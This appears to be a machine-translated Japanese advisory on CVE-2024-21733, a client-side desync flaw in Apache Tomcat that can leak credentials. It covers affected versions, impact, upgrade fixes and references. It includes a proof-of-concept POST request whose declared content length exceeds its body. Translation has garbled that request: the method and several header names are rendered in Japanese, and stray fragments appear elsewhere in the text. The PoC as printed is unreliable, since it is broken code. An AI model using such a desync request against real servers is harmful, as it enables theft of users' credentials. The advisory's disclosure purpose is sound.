説明
Apache Tomcat®は、Jakarta Servlet、Jakarta Server Pages、Jakarta Expression Language、Jakarta WebSocket、Jakarta Annotations、Jakarta Authentication Specificationをオープンソースで実装したソフトウェアです。認証仕様。
Apache Tomcat 8.5.7 から 8.5.63 および 9.0.0-M11 から 9.0.43 には、クライアント側同期解除 (CSD) 攻撃の脆弱性があります。
影響を及ぼす
クライアント側同期解除(CSD)に関する脆弱性は、ウェブサーバがPOSTリクエストのコンテンツ長を正確に処理できない場合に発生する。この問題を利用すると、攻撃者は被害者のブラウザを操作して、ウェブサイトからの切断を誤らせることができる。この操作により、サーバーとクライアントの接続から機密データが不正に抜き取られる可能性があります。
影響の深刻度は、Tomcat をバックエンドの Web サーバとして使用しているアプリケーションによって異なり、プレーンテキストの認証情報などの機密情報が公開される可能性があります。例えば、ManageEngine の ADSelfService Plus ポータルのバージョン 6304 より前のバージョンでは、以下のように、クライアント接続からプレーンテキストの Active Directory 認証情報を密かに取得することが可能なインスタンスが見つかりました。
PoC/エクスプロイト
ポスト / http/1.1
ホスト:ホスト名
Sec-Ch-Ua:"クロム";v="119″、"Not?A_Brand";v="24″。
Sec-Ch-Ua-Mobile:?
Sec-Ch-Ua-Platform:"Linux"
アップグレード-安全でないリクエスト: 1
ユーザーエージェント: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
受け入れる: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.7
Sec-Fetch-Site:なし
セックフェッチモード:ナビゲート
Sec-Fetch-User: ?1
Sec-Fetch-Dest: ドキュメント
Accept-Encoding: gzip、deflate、br
Accept-Language: en-US,en;q=0.9
優先順位: u=0, i
接続:キープアライブ
コンテンツ長:6
Content-Type: application/x-www-form-urlencoded
バツ
処方
影響を受けるバージョンのユーザーは、以下のいずれかの緩和策を講じるべきである:
Apache Tomcat 9.0.44以降へのアップグレード
Apache Tomcat 8.5.64以降へのアップグレード
出典:Sn1perSecurity LLCのxer0dayzは、この脆弱性をTomcatセキュリティチームに責任を持って報告した。
履歴:2024-01-19
セキュリティ情報全文:https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz
書誌
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21733
https://tomcat.apache.org/security-9.html
https://tomcat.apache.org/security-8.html
https://portswigger.net/research/browser-powered-desync-attacks
https://hackerone.com/reports/2327341
元記事はChief Security Officerによるもので、転載の際はhttps://cncso.com/jp/cve-2024-21733-apache-tomcat-http-request-smuggling-html。
